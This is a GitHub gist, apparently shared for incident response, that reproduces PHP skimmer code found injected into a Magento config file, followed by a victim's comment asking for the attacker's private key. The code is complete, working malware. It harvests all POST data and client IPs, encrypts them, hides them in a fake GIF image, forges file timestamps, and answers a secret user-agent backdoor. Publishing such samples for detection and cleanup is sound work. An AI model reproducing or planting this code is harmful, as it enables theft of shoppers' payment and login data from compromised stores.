Create a gist now

Instantly share code, notes, and snippets.

@litzinger /hack.php
Last active Jun 20, 2016

Embed
What would you like to do?
Download ZIP
The following was added to the magento includes/config.php file
Raw
hack.php
<?PHP
$y0 = './skin/adminhtml/default/default/images/cancel_icon_bg.gif';
$m1 = '1355773528';
$k2 = 'pccbe60c';
$k3 = "-----BEGIN PUBLIC KEY-----\nMIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgFiKhzEGVUxLdkdAPmTVH74QwWBk\n0cDppNX3n0fmVZyBPcYZ5YIbEeSLIOCXKb5xT/ZrwYyk13jMIho9WPlLRJdxT2Rj\nbcMvXszvWBwh1lCovrl6/kulIq5ZcnDFdlcKzW2PR/19+gkKhRGk1YUXMLgw6EFj\nj2c1LJoSpnzk8WRFAgMBAAE=\n-----END PUBLIC KEY-----";
if (@$_SERVER['HTTP_USER_AGENT'] == 'Visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)') {
if (isset($_GET[$k2])) {
$m1 = file_exists($y0)
? @filemtime($y0)
: $m1;
@file_put_contents($y0, '');
@touch($y0, $m1, $m1);
echo 'clean ok';
} else {
echo 'Pong';
}
exit;
}if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
$i4 = $_SERVER['HTTP_CLIENT_IP'];
} elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
$i4 = $_SERVER['HTTP_X_FORWARDED_FOR'];
} else {
$i4 = @$_SERVER['REMOTE_ADDR'];
}if (isset($_POST) && sizeof($_POST)) {
$a5 = '';
foreach ($_POST as $h6 => $n7) {
if (is_array($n7)) {
foreach ($n7 as $f8 => $l9) {
if (is_array($l9)) {
foreach ($l9 as $l10 => $v11) {
if (is_array($v11)) {
;
} else {
$a5 .= ':' . $h6 . '[' . $f8 . '][' . $l10 . ']=' . $v11;
}
}
} else {
$a5 .= ':' . $h6 . '[' . $f8 . ']=' . $l9;
}
}
} else {
$a5 .= ':' . $h6 . '=' . $n7;
}
}
$a5 = $i4 . $a5;
} else {
$a5 = null;
}if ($a5) {
$t12 = false;
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists(
'openssl_encrypt'
)
) {
$t12 = true;
} elseif (function_exists('dl')) {
$n13 = strtolower(substr(php_uname(), 0, 3));
$d14 = 'php_openssl.' . ($n13 == 'win'
? 'dll'
: 'so');
@dl($d14);
if (function_exists('openssl_get_publickey') && function_exists('openssl_public_encrypt') && function_exists(
'openssl_encrypt'
)
) {
$t12 = true;
}
}
if ($t12) {
$t15 = @openssl_get_publickey($k3);
$q16 = 128;
$t17 = '';
$h18 = md5(md5(microtime()) . rand());
$e19 = $h18;
while ($e19) {
$f20 = substr($e19, 0, $q16);
$e19 = substr($e19, $q16);
@openssl_public_encrypt($f20, $h21, $t15);
$t17 .= $h21;
}
$t22 = @openssl_encrypt($a5, 'aes128', $h18);
@openssl_free_key($t15);
$a5 = $t17 . ':::SEP:::' . $t22;
}
$m1 = file_exists($y0)
? @filemtime($y0)
: $m1;
@file_put_contents($y0, 'JPEG-1.1' . base64_encode($a5), FILE_APPEND);
@touch($y0, $m1, $m1);
}?>
@Ben749

This comment has been minimized.

Show comment
Hide comment
@Ben749

Ben749 Jun 20, 2016

Hi, does anyone have his private key, so I could parse the 378Mo pseudo image file to know which postdata have been stolen ??

Ben749 commented Jun 20, 2016

Hi, does anyone have his private key, so I could parse the 378Mo pseudo image file to know which postdata have been stolen ??
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment